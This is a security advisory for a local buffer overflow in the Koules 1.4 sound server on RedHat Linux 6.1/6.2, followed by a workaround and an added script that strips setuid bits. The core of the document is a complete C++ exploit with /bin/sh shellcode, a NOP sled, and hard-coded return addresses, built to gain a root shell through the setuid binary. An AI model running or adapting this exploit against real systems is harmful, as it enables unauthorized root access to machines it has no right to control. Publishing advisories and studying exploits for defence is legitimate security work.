Koules 1.4 local buffer overflow vulnerability
Published: 2000-11-21
Updated: 2000-11-21
Affected systems:
Koules 1.4
- RedHat Linux 6.1
- RedHat Linux 6.2
Description:
The koules.sndsrv.linux sound server shipped with Koules 1.4 does not check the
length of its command-line arguments. An attacker can exploit this buffer
overflow to obtain root privileges.
Only hosts running the 'koules' build compiled with SVGALIB support and
without X Windows are affected by this problem.
<* Source: Scrippie (Scrippie/ronald@grafix.nl)
http://www.synnergy.net
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
/* Synnergy.net (c) 2000 */
#include <cstdio>
#include <cstdlib>
#include <cstring>   /* memcpy */
#include <string>
#include <unistd.h>

using namespace std;

#define FILENAME "/usr/local/lib/koules/koules.sndsrv.linux"
#define NOP 'A'
#define NUMNOPS 500
#define RETADDY "\x90\xfe\xff\xbf"

/* Since we return in the cleared environment, we don't need to have a
   return address we can influence by command line "offset" arguments */
string heavenlycode =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char *addytostr(unsigned char *);

int main()
{
    string payload, vector;
    unsigned int i;
    const char *env[3];
    const char *ptr_to_bffffffc;

    /* Construction of our payload */
    payload.append(NUMNOPS, NOP);
    payload.append(heavenlycode);
    env[0] = payload.c_str();
    /* This memory address always contains 0x00000000 */
    env[1] = "\xfc\xff\xff\xbf";
    env[2] = NULL;

    /* Calculate for yourself, and check out: linux/fs/exec.c */
    ptr_to_bffffffc =
        addytostr((unsigned char *)(0xc0000000-sizeof(void *)-sizeof(FILENAME)
                  -sizeof(heavenlycode)-sizeof(char *)-1));

    for(i=0;i<256;i++) {
        vector.append(RETADDY);   /* Fill the buffer */
    }
    /* We do NOT overwrite 'int i' - a register is used after gcc -O */
    vector.append(RETADDY);        /* Overwrites ebp */
    vector.append(RETADDY);        /* Overwrites eip */
    vector.append(ptr_to_bffffffc); /* Overwrites argv argument */

    execle(FILENAME, "Segmentation fault (core dumped)", vector.c_str(), "A",
           NULL, env);
    /* Only reached if execle() itself failed */
    perror("execle()");
    return EXIT_FAILURE;
}

/* Copy the raw 4-byte pointer value into a NUL-terminated string */
char *addytostr(unsigned char *blaat)
{
    char *ret;

    if(!(ret = (char *)malloc(sizeof(unsigned char *)+1))) {
        perror("malloc()");
        exit(EXIT_FAILURE);
    }
    memcpy(ret, &blaat, sizeof(unsigned char *));
    ret[sizeof(unsigned char *)] = 0x00;
    return(ret);
}
Recommendations:
Temporary workaround:
Remove the suid/sgid bits from koules.sndsrv.linux:
chmod a-s koules.sndsrv.linux
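The workaround above as an added script (not part of the advisory): it checks whether a koules.sndsrv.linux binary still carries setuid/setgid bits and strips them with the advisory's chmod a-s. The default path /usr/local/lib/koules/koules.sndsrv.linux is taken from the exploit's FILENAME; the self-check runs on a constructed temporary file.

```sh
#!/bin/sh
# Added example, not from the advisory. Detect and remove the suid/sgid bits
# on the Koules sound server, which is what makes the overflow root-exploitable.

# Return 0 if the file has setuid or setgid set, 1 otherwise.
has_suid_sgid() {
    [ -u "$1" ] || [ -g "$1" ]
}

# Strip both bits (the advisory's 'chmod a-s') and print one of
# "fixed", "already-clean" or "missing". Path defaults to the advisory's.
fix_sndsrv() {
    f="${1:-/usr/local/lib/koules/koules.sndsrv.linux}"
    if [ ! -f "$f" ]; then
        echo "missing"
        return 1
    fi
    if has_suid_sgid "$f"; then
        chmod a-s "$f" || return 1
        echo "fixed"
    else
        echo "already-clean"
    fi
}

# Self-check on a constructed temporary file so it runs without the game
# installed: first call strips the bits, second finds nothing to do.
demo() {
    t=$(mktemp) || return 1
    chmod u+s,g+s "$t"
    r1=$(fix_sndsrv "$t")   # "fixed"
    r2=$(fix_sndsrv "$t")   # "already-clean"
    rm -f "$t"
    echo "$r1 $r2"
}

demo
```

Run it as root against the real path once the self-check passes; rechecking with has_suid_sgid after a package reinstall catches the bits coming back.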
Vendor patch:
None available yet